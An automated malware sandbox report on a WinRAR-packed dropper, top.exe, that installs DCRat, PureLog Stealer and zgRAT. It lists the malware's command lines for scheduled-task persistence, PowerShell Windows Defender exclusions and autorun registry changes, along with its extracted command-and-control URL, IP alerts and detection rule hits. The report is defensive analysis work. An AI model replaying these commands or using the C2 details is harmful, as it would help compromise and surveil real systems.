
Windows Analysis Report
top.exe

Overview

General Information

Sample name: top.exe
Analysis ID: 1589198
MD5: 92d29106be881759ef6f045a3415137d
SHA1: 9b307b4b98851c4325a1f2746c7827a0d14c7e36
SHA256: b1996319c3b0fafa04179dd7b7de47c74be2dc3dc0d6aa04030b645970e1a9b0
Tags: DCRat, exe, NyashTeam, user-MalHunter1

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • top.exe (PID: 5804 cmdline: "C:\Users\user\Desktop\top.exe" MD5: 92D29106BE881759EF6F045A3415137D)
    • wscript.exe (PID: 6024 cmdline: "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6484 cmdline: C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WinPerfcommon.exe (PID: 1020 cmdline: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
          • csc.exe (PID: 7060 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 3652 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FDD.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 4052 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5372 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES520F.tmp" "c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 4072 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6184 cmdline: schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • powershell.exe (PID: 1272 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1784 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6616 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4072 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\SystemSettings.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5552 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6184 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msproviderBrokerMonitornet\WinPerfcommon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7336 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7472 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7572 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
        • Conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • WinPerfcommon.exe (PID: 7544 cmdline: C:\msproviderBrokerMonitornet\WinPerfcommon.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • WinPerfcommon.exe (PID: 7552 cmdline: C:\msproviderBrokerMonitornet\WinPerfcommon.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • cleanup
{"C2 url": "http://fsin.top/javascriptCentraldownloads", "MUTEX": "DCR_MUTEX-nQmtb0EsMA9tAW54k3K0", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author
top.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
top.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author
C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\msproviderBrokerMonitornet\WinPerfcommon.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(7 further entries not shown)

Source | Rule | Description | Author
00000006.00000000.2354556207.00000000006E2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000003.2044302589.00000000065FE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000003.2045393819.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: WinPerfcommon.exe PID: 1020 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author
0.3.top.exe.664c701.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.3.top.exe.664c701.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.3.top.exe.6f5c701.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.3.top.exe.6f5c701.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.3.top.exe.6f5c701.1.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(5 further entries not shown)

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ProcessId: 1020, TargetFilename: C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', ProcessId: 1272, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ProcessId: 1020, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ProcessId: 1020, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", ProcessId: 7060, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', ProcessId: 1272, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\top.exe", ParentImage: C:\Users\user\Desktop\top.exe, ParentProcessId: 5804, ParentProcessName: top.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" , ProcessId: 6024, ProcessName: wscript.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ProcessId: 1020, TargetFilename: C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', ProcessId: 1272, ProcessName: powershell.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", ProcessId: 7060, ProcessName: csc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T16:26:23.560182+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49977 | 37.44.238.250 | 80 | TCP
2025-01-11T16:26:33.496954+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49978 | 37.44.238.250 | 80 | TCP
2025-01-11T16:26:59.674732+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49979 | 37.44.238.250 | 80 | TCP
2025-01-11T16:27:26.325074+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49980 | 37.44.238.250 | 80 | TCP
2025-01-11T16:27:37.715695+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49981 | 37.44.238.250 | 80 | TCP
2025-01-11T16:27:43.583688+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49982 | 37.44.238.250 | 80 | TCP

AV Detection

Source: top.exe | Avira: detected
Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\kTYwyifI.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\alFgOGaa.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\Qxaqfufs.log | Avira: detection malicious, Label: TR/AD.BitpyRansom.lcksd
Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://fsin.top/javascriptCentraldownloads", "MUTEX": "DCR_MUTEX-nQmtb0EsMA9tAW54k3K0", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | ReversingLabs: Detection: 63%
Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | Virustotal: Detection: 70%
Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe | ReversingLabs: Detection: 63%
Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe | Virustotal: Detection: 70%
Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe | ReversingLabs: Detection: 63%
Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe | Virustotal: Detection: 70%
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\GOHavRZK.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\Qxaqfufs.log | ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\ZndYtGLf.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\alFgOGaa.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\kTYwyifI.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | ReversingLabs: Detection: 63%
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | ReversingLabs: Detection: 63%
Source: top.exe | Virustotal: Detection: 56%
Source: top.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\kTYwyifI.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SHwrfMKt.log | Joe Sandbox ML: detected
Source: top.exe | Joe Sandbox ML: detected
Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp | String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"20c484a2-7b5b-481d-bf01-55d423c9c2fd":{"_0":""},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-nQmtb0EsMA9tAW54k3K0","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmxlVWwzU1dwdmFXVXhUbHBWTVZKR1ZGVlNVMU5XV2tabVV6bFdZekpXZVdONU9HbE1RMGw0U1dwdmFWcHRSbk5qTWxWcFRFTkplVWxxYjJsYWJVWnpZekpWYVV4RFNYcEphbTlwWkVoS01WcFRTWE5KYWxGcFQybEtNR051Vm14SmFYZHBUbE5KTmtsdVVubGtWMVZwVEVOSk1rbHFiMmxrU0VveFdsTkpjMGxxWTJsUGFVcHRXVmQ0ZWxwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp | String decryptor: [["http://fsin.top/","javascriptCentraldownloads"]]
Source: top.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Directory created: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Directory created: C:\Program Files\MSBuild\Microsoft\9e60a5f7a3bd80
Source: top.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: top.exe
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\imeik232\imeik232.pdb | source: WinPerfcommon.exe, 00000006.00000002.2427021597.000000000343E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.pdb | source: WinPerfcommon.exe, 00000006.00000002.2427021597.000000000343E000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0045A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0045A69B
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0046C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0046C220
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0047B348 FindFirstFileExA,0_2_0047B348
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File opened: C:\Users\user
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File opened: C:\Users\user\AppData
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File opened: C:\Users\user\AppData\Local
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File opened: C:\Users\user\Desktop\desktop.ini

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49982 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49980 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49977 -> 37.44.238.250:80
